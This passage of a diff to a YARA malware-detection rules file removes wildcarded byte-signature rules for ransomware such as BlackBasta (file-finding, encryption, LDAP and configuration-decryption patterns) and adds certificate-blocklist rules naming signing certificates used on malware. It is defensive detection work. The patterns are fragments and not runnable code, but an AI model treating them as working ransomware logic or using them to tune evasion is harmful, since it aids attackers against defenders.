-            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA A5 04 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? BA 0F 03 00 00 B9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 C9 BE ?? ?? ?? ?? 85 FF 74 ?? 8B 15 ??
-            ?? ?? ?? 0F 1F 44 00 ?? 80 3C 0A ?? 8D 46 ?? 0F 45 C6 41 8B F0 3B CF 72 ?? 8D 0C B5
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 89 1D ?? ?? ?? ?? 85 DB 74 ?? 33 FF 85 F6 74 ?? 90
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 04 BB 47 3B FE 72 ?? 8B 0D ?? ??
-            ?? ?? 33 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 0F 1F 80 ?? ?? ?? ?? 8B 14 B3 8A 08 8D 40 ??
-            88 0A 8D 52 ?? 84 C9 75 ?? 33 C9 E8 ?? ?? ?? ?? 46 85 C0 75 ?? C7 04 B3 ?? ?? ?? ??
-            5F 5E 5B 8B E5 5D C3
-        }
-		$decrypt_configuration_v2_2 = {
-            55 8B EC 51 53 56 57 8B F2 8B F9 6B CE ?? E8 ?? ?? ?? ?? 8B C8 33 C0 89 4D ?? 85 C9
-            0F 84 ?? ?? ?? ?? 85 F6 74 ?? 83 FE ?? 72 ?? 0F 28 0D ?? ?? ?? ?? 8B CE 83 E1 ?? 66
-            0F 1F 84 00 ?? ?? ?? ?? 0F 10 04 07 66 0F EF C1 0F 11 04 07 0F 10 44 07 ?? 66 0F EF
-            C1 0F 11 44 07 ?? 0F 10 44 07 ?? 66 0F EF C1 0F 11 44 07 ?? 0F 10 44 07 ?? 66 0F EF
-            C1 0F 11 44 07 ?? 83 C0 ?? 3B C1 72 ?? 8B 4D ?? 3B C6 73 ?? 80 34 38 5F 40 3B C6 72
-            ?? 8B 5D ?? 8B D6 51 53 51 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 0B E8 ?? ??
-            ?? ?? 8B F8 8B 45 ?? 89 38 8B 45 ?? 85 FF 74 ?? 8B 0B 8B F0 F3 A4 8B C8 BE ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B C6 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_v2_p1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 56 57 66 90 64 A1 ?? ?? ?? ?? 0F 57 C0 C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 0F 13 44 24 ?? 8B 40 ?? 8B 40 ?? 8B 00 8B
-            50 ?? A1 ?? ?? ?? ?? 89 54 24 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 D2 0F 84 ?? ?? ?? ?? 8B
-            42 ?? 8B 4C 10 ?? 8D 04 11 89 44 24 ?? 3B C2 74 ?? 33 C9 89 4C 24 ?? 39 48 ?? 74 ??
-            8B 40 ?? 03 C2 89 44 24 ?? 0F 1F 80 ?? ?? ?? ?? 8B 30 BF C5 9D 1C 81 8A 04 16 03 F2
-            46 84 C0 74 ?? 0F BE D0 8D 76 ?? 2C ?? 8B CA 83 C9 ?? 3C ?? 8A 46 ?? 0F 47 CA 33 CF
-            69 F9 93 01 00 01 84 C0 75 ?? 8B 54 24 ?? 8B 4C 24 ?? 81 FF ?? ?? ?? ?? 74 ?? 8B 74
-            24 ?? 41 8B 44 24 ?? 83 C0 ?? 89 4C 24 ?? 89 44 24 ?? 3B 4E ?? 75 ?? 33 C0 A3 ?? ??
-            ?? ?? 6A ?? 8D 4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF D0 85
-            C0 0F 88 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? 8B 07 48 83 F8
-            ?? 0F 87 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 8B 74 24 ?? 8B 46 ?? 8D 04 48 0F B7 0C 10
-            8B 46 ?? 8D 04 88 8B 04 10 03 C2 EB ?? 83 7F ?? ?? 0F 85 ?? ?? ?? ?? 83 7F ?? ?? 0F
-            85 ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 8B 4C 24 ?? 8B 54 24 ?? 68 ?? ?? ?? ?? 6A ?? 8B 41
-            ?? 89 42 ?? 8B 41 ?? 89 42 ?? 8B 44 24 ?? 6A ?? 8B 40 ?? 8D 88 ?? ?? ?? ?? F7 D8 23
-            C8 8B 44 24 ?? 89 48 ?? 8D 4C 24 ?? 8B 54 24 ?? 8B 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            8D 84 24 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? FF 76 ?? FF 76 ?? FF 15 ?? ?? ?? ?? 8B 4E
-            ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 8B 46 ?? 81 C1 ?? ?? ?? ?? 03 C1 50 E8 ?? ?? ?? ??
-            8B 4C 24 ?? 83 C4 ?? 8B 74 24 ?? 89 74 24 ?? 6A ?? 8D 41 ?? 50 FF 71 ?? 8D 41 ?? FF
-        }
-		$encrypt_files_v2_p2 = {
-            71 ?? 50 51 6A ?? 6A ?? FF 76 ?? E8 ?? ?? ?? ?? FF D0 85 C0 0F 89 ?? ?? ?? ?? 83 C8
-            ?? F0 0F C1 46 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ??
-            33 FF 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 8B 0E E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 76 ?? 47
-            8B 40 ?? 3B F8 72 ?? 8B 74 24 ?? 85 C0 E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 56 ?? 8B C1
-            F0 0F B1 0A 83 F8 ?? 75 ?? 8B 46 ?? 89 44 24 ?? 0F B7 46 ?? 83 C0 ?? 8B C8 89 44 24
-            ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 0F B7 4E ?? 51 FF 76 ?? 8D 4F ?? 51 E8 ?? ?? ??
-            ?? 0F B7 46 ?? 83 C4 ?? 89 47 ?? 0F 57 C0 8D 44 24 ?? C6 07 ?? C7 47 ?? ?? ?? ?? ??
-            6A ?? FF 74 24 ?? 66 0F 13 44 24 ?? 57 50 FF 74 24 ?? E8 ?? ?? ?? ?? FF D0 8B CF E8
-            ?? ?? ?? ?? 8D 56 ?? 85 F6 0F 84 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 02 0F 85 ?? ?? ?? ??
-            6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 C9 0F 84
-            ?? ?? ?? ?? 8D 7E ?? 90 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 7F ?? 8B 4E ?? 40 89 44
-            24 ?? 3B C1 72 ?? E9 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 8D 56 ?? 74 ?? 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 8B 57 ?? 50 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            C1 6A ?? EB ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 8D 8C 24 ?? ?? ?? ?? 8B
-            57 ?? 50 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 83 7A ?? ?? 8B 42 ?? 0F 8F ??
-            ?? ?? ?? 7C ?? 39 42 ?? 0F 87 ?? ?? ?? ?? 8B 74 24 ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 4E
-        }
-		$encrypt_files_v2_p3 = {
-            8D 84 24 ?? ?? ?? ?? 83 C4 ?? 81 C1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B 46 ?? 03 C1 50
-            E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? C7 00 ?? ?? ?? ?? EB ?? 8B 44 24 ?? C7 00 ?? ??
-            ?? ?? 8B 4C 24 ?? 8B 74 24 ?? 6A ?? 89 74 24 ?? 8D 41 ?? 50 FF 71 ?? 8D 41 ?? FF 71
-            ?? 50 51 6A ?? 6A ?? FF 76 ?? E8 ?? ?? ?? ?? FF D0 85 C0 0F 89 ?? ?? ?? ?? 83 C8 ??
-            F0 0F C1 46 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? 33
-            FF 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 8B 0E E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 76 ?? 47 8B
-            40 ?? 3B F8 72 ?? 8B 74 24 ?? 85 C0 E9 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 46 ?? 0F 85 ??
-            ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85
-            C9 0F 84 ?? ?? ?? ?? 8D 7E ?? 66 0F 1F 44 00 ?? 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D
-            7F ?? 8B 4E ?? 40 89 44 24 ?? 3B C1 72 ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 56 ?? 8B
-            C1 F0 0F B1 0A 83 F8 ?? 75 ?? 8B 46 ?? 89 44 24 ?? 0F B7 46 ?? 83 C0 ?? 8B C8 89 44
-            24 ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 0F B7 4E ?? 51 FF 76 ?? 8D 4F ?? 51 E8 ?? ??
-            ?? ?? 0F B7 46 ?? 83 C4 ?? 89 47 ?? 0F 57 C0 8D 44 24 ?? C6 07 ?? C7 47 ?? ?? ?? ??
-            ?? 6A ?? FF 74 24 ?? 66 0F 13 44 24 ?? 57 50 FF 74 24 ?? E8 ?? ?? ?? ?? FF D0 8B CF
-            E8 ?? ?? ?? ?? 8D 56 ?? 85 F6 0F 84 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 02 0F 85 ?? ?? ??
-            ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 C9 74
-            ?? 8D 7E ?? 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 7F ?? 8B 4E ?? 40 89 44 24 ?? 3B C1
-            72 ?? 85 C9 74 ?? F0 FF 05 ?? ?? ?? ?? F0 FF 0D ?? ?? ?? ?? 8B 46 ?? 85 C0 74 ?? 50
-            E8 ?? ?? ?? ?? FF D0 8D 46 ?? 50 E8 ?? ?? ?? ?? FF D0 8B CE E8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 5F 33 C0 5E 8B E5 5D C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "18:b7:00:a3:19:aa:98:ae:71:b2:79:d4:e8:03:0b:82" and 1479686400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_169138A86954Be1D9B264F47 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "56653f72-39af-50e7-9908-e516f9b21084"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16926-L16942"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "1584e39b4e2025611bcb7bbbd92b97d25d12ddbb1e5c282db87730a03f7f56b1"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $enum_resources_v1 ) and ( all of ( $find_files_v1_* ) ) and ( all of ( $encrypt_files_v1_* ) ) ) or ( ( $check_blacklisted_languages_v2 ) and ( $fnv1a_hashing_v2 ) and ( $create_net_host_trav_threads_v2 ) and ( all of ( $decrypt_configuration_v2_* ) ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "16:91:38:a8:69:54:be:1d:9b:26:4f:47" and 1477636474 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Blackbasta : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_33412168Eeb3C0E4C7Dd0508A9Ffecd5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BlackBasta ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7c451fde-b8b1-5a35-855e-7e30f3e75cbb"
-		date = "2022-09-01"
-		modified = "2022-12-13"
+		id = "db2ae33e-d3af-5200-ad15-824e29434e2c"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BlackBasta.yara#L1-L531"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16944-L16960"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c68671e51489af00e9e0cf28373e5ec01bda042653dbcca8843357eede41f27f"
+		logic_hash = "d634af0637c3349fe1718ee807b8a75007ab46b141494331901a22ce54e9fc5d"
 		score = 75
-		quality = 88
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		quality = 90
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BlackBasta"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B F0 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C6
-            E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85 ?? ?? ?? ?? 89 9D ??
-            ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88
-            9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75
-            ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ??
-            ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ??
-            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15
-        }
-		$encrypt_files_v1 = {
-            6A ?? E8 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 89 B5 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 6A ?? 57 56 E8 ?? ?? ?? ?? 8D 4F
-            ?? 6A ?? 51 53 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A
-            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 FF B5 ?? ?? ?? ?? 57 53 56 83 EC ?? 8B F4 89 A5
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D ?? E8 ??
-            ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
-            ?? FF B5 ?? ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ??
-            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
-            ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 80 BD ?? ?? ?? ?? ??
-            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-        }
-		$cmd_prompt = {
-            8B FF 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? FC 53 56 8B 75 ?? 8D 45 ?? 33 DB
-            68 ?? ?? ?? ?? 53 50 89 5D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 F8 ?? 0F 84 ??
-            ?? ?? ?? 85 F6 75 ?? 53 39 5D ?? 75 ?? E8 ?? ?? ?? ?? 59 33 C0 E9 ?? ?? ?? ?? FF 75
-            ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 85 F6 0F 94 C0 E9 ??
-            ?? ?? ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 89 5D ?? 57 85 C0 74 ?? E8
-            ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 53 89 18 8D 45 ?? 50 FF 75 ?? 53 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B F0 E8 ?? ?? ?? ?? 83 FE ?? 74 ?? 89 38 EB ?? 83 38 ?? 74 ?? E8 ?? ?? ?? ??
-            83 38 ?? 74 ?? 83 CE ?? FF 75 ?? E8 ?? ?? ?? ?? 59 EB ?? E8 ?? ?? ?? ?? 89 38 53 8D
-            45 ?? B9 ?? ?? ?? ?? 50 51 53 89 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 E8 ?? ?? ?? ??
-            83 C4 ?? 8B C6 5F 8B 4D ?? 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 53
-        }
-		$ldap_connect = {
-            C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ??
-            50 6A ?? 53 8B 35 ?? ?? ?? ?? FF D6 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 53 FF D6
-            6A ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ??
-            85 C0 74 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ??
-            8B F0 89 75 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 56 53 FF 15 ?? ?? ?? ?? 83 C4 ??
-            85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ??
-            ?? ?? ?? FF 75 ?? 57 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 8B
-            06 85 C0 0F 84 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 50 8B 4D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 36 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 8B C8 89 4D ?? 8B 01 8B 40 ?? C6 45 ?? ?? 8B 44 08 ?? 8B 58 ?? 89 5D
-            ?? 8B 03 8B CB FF 50 ?? 83 4D ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 10 6A ??
-            8B C8 FF 52 ?? 0F B7 C0 89 45 ?? 83 65 ?? ?? C6 45 ?? ?? 85 DB 74 ?? 8B 03 8B CB FF
-            50 ?? 8B C8 85 C9 74 ?? 8B 01 6A ?? FF 10 8B 45 ?? 50 8B 4D ?? E8 ?? ?? ?? ?? 8B 4D
-            ?? E8 ?? ?? ?? ?? 8B 5D ?? 56 FF 15
-        }
-		$encrypt_files_v2 = {
-            8D 45 ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 6A ?? 57 53 FF 75 ?? 83 EC ?? 8B
-            F4 89 A5 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 45 ?? 89 45 ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75
-            ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8
-            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-        }
-		$encrypt_files_v3 = {
-            6A ?? E8 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 89 B5 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 6A ?? 57 56 E8 ?? ?? ?? ?? 8D 4F
-            ?? 6A ?? 51 53 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A
-            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 6A ?? 57 53 56 83 EC ?? 8B F4 89 A5 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D ?? E8 ?? ?? ?? ?? C6
-            45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF B5 ??
-            ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 57 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45
-            ?? ?? 8D 8D ?? ?? ?? ?? E8
-        }
-		$encrypt_files_v4 = {
-            8D 45 ?? 50 E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 11 45 ?? 0F 10 45 ?? 0F 11 45 ?? 8B 45 ??
-            8B 4D ?? 89 45 ?? 89 4D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ??
-            8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 56 57 8D 45 ?? 50 8D 45 ?? 50 83 EC ?? 8B
-            F4 89 A5 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85
-            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? EB ?? 8D 85
-            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8D 0C 4D ?? ?? ?? ?? 89 8D ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B
-            50 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 66 89 85 ?? ?? FF FF C6
